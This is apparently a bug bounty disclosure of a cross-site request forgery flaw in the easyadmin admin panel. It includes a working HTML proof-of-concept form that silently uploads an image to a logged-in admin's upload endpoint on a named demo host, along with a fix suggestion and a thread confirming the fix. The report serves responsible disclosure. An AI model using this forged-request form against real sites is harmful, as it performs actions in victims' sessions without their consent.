Cross-Site Request Forgery (CSRF) in zhongshaofa/easyadmin

Valid

Reported on

Aug 4th 2021


✍️ Description

Attacker able to upload any picture with CSRF attack.

It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.

In CSRF attacks it is necessary that a user logged into your application just going to a malicious website and after that only with a redirection attacker can upload any picture, this means only with visiting a site a picture will be uploaded.

🕵️‍♂️ Proof of Concept

1.fisrt user already should be logged in In Firefox or safari.

2.Open the PoC.html and click on submit button ( Also it can be auto-submit)

3.A black picture will be uploaded after clicking on submit button on PoC.html file.

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://easyadmin.99php.cn/admindemo/ajax/upload" method="POST" enctype="multipart/form-data">
<input type="hidden" name="file" value="ÿØÿà&#0;&#16;JFIF&#0;&#1;&#1;&#1;&#0;&#96;&#0;&#96;&#0;&#0;ÿá&#0;&quot;Exif&#0;&#0;MM&#0;&#42;&#0;&#0;&#0;&#8;&#0;&#1;&#1;&#18;&#0;&#3;&#0;&#0;&#0;&#1;&#0;&#1;&#0;&#0;&#0;&#0;&#0;&#0;ÿÛ&#0;C&#0;&#2;&#1;&#1;&#2;&#1;&#1;&#2;&#2;&#2;&#2;&#2;&#2;&#2;&#2;&#3;&#5;&#3;&#3;&#3;&#3;&#3;&#6;&#4;&#4;&#3;&#5;&#7;&#6;&#7;&#7;&#7;&#6;&#7;&#7;&#8;&#9;&#11;&#9;&#8;&#8;&#10;&#8;&#7;&#7;&#10;&#13;&#10;&#10;&#11;&#12;&#12;&#12;&#12;&#7;&#9;&#14;&#15;&#13;&#12;&#14;&#11;&#12;&#12;&#12;ÿÛ&#0;C&#1;&#2;&#2;&#2;&#3;&#3;&#3;&#6;&#3;&#3;&#6;&#12;&#8;&#7;&#8;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;&#12;ÿÀ&#0;&#17;&#8;&#0;&#17;&#0;&#19;&#3;&#1;&quot;&#0;&#2;&#17;&#1;&#3;&#17;&#1;ÿÄ&#0;&#31;&#0;&#0;&#1;&#5;&#1;&#1;&#1;&#1;&#1;&#1;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#1;&#2;&#3;&#4;&#5;&#6;&#7;&#8;&#9;&#10;&#11;ÿÄ&#0;µ&#16;&#0;&#2;&#1;&#3;&#3;&#2;&#4;&#3;&#5;&#5;&#4;&#4;&#0;&#0;&#1;&#125;&#1;&#2;&#3;&#0;&#4;&#17;&#5;&#18;&#33;1A&#6;&#19;Qa&#7;&quot;q&#20;2&#129;&#145;&#161;&#8;&#35;B&#177;Á&#21;RÑð&#36;3br&#130;&#9;&#10;&#22;&#23;&#24;&#25;&#26;&#37;&amp;&apos;&#40;&#41;&#42;456789&#58;CDEFGHIJSTUVWXYZcdefghijstuvwxyz&#131;&#132;&#133;&#134;&#135;&#136;&#137;&#138;&#146;&#147;&#148;&#149;&#150;&#151;&#152;&#153;&#154;&#162;&#163;&#164;&#165;&#166;&#167;&#168;&#169;ª&#178;&#179;&#180;µ&#182;&#183;&#184;&#185;ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ&#215;ØÙÚáâãäåæçèéêñòóôõö&#247;øùúÿÄ&#0;&#31;&#1;&#0;&#3;&#1;&#1;&#1;&#1;&#1;&#1;&#1;&#1;&#1;&#0;&#0;&#0;&#0;&#0;&#0;&#1;&#2;&#3;&#4;&#5;&#6;&#7;&#8;&#9;&#10;&#11;ÿÄ&#0;µ&#17;&#0;&#2;&#1;&#2;&#4;&#4;&#3;&#4;&#7;&#5;&#4;&#4;&#0;&#1;&#2;w&#0;&#1;&#2;&#3;&#17;&#4;&#5;&#33;1&#6;&#18;AQ&#7;aq&#19;&quot;2&#129;&#8;&#20;B&#145;&#161;&#177;Á&#9;&#35;3Rð&#21;brÑ&#10;&#22;&#36;&#37;ñ&#23;&#24;&#25;&#26;&amp;&apos;&#40;&#41;&#42;56789&#58;CDEFGHIJSTUVWXYZcdefghijstuvwxyz&#130;&#131;&#132;&#133;&#134;&#135;&#136;&#137;&#138;&#146;&#147;&#148;&#149;&#150;&#151;&#152;&#153;&#154;&#162;&#163;&#164;&#165;&#166;&#167;&#168;&#169;ª&#178;&#179;&#180;µ&#182;&#183;&#184;&#185;ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ&#215;ØÙÚâãäåæçèéêòóôõö&#247;øùúÿÚ&#0;&#12;&#3;&#1;&#0;&#2;&#17;&#3;&#17;&#0;&#63;&#0;þ&#127;è&#162;&#138;&#0;&#40;&#162;&#138;&#0;&#40;&#162;&#138;&#0;&#40;&#162;&#138;&#0;ÿÙ" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Also for real attacks the submit button can be auto-submit.

💥 Impact

This vulnerability is capable of upload any picture.

Fix

set a token with a length bigger that 16 characters in every requests body then attacker never can guess the url. Also you cat turn Lax to Strict in cookies. 📍 Location app.php#L1

amammad modified the report
a year ago
Z-Old
a year ago

Admin


Hey amammad, I've emailed the repo maintainer for you.

We have contacted a member of the zhongshaofa/easyadmin team and are waiting to hear back a year ago
Mr.Chung confirmed that a fix has been merged on 4cb2be a year ago
Mr.Chung has been awarded the fix bounty
to join this conversation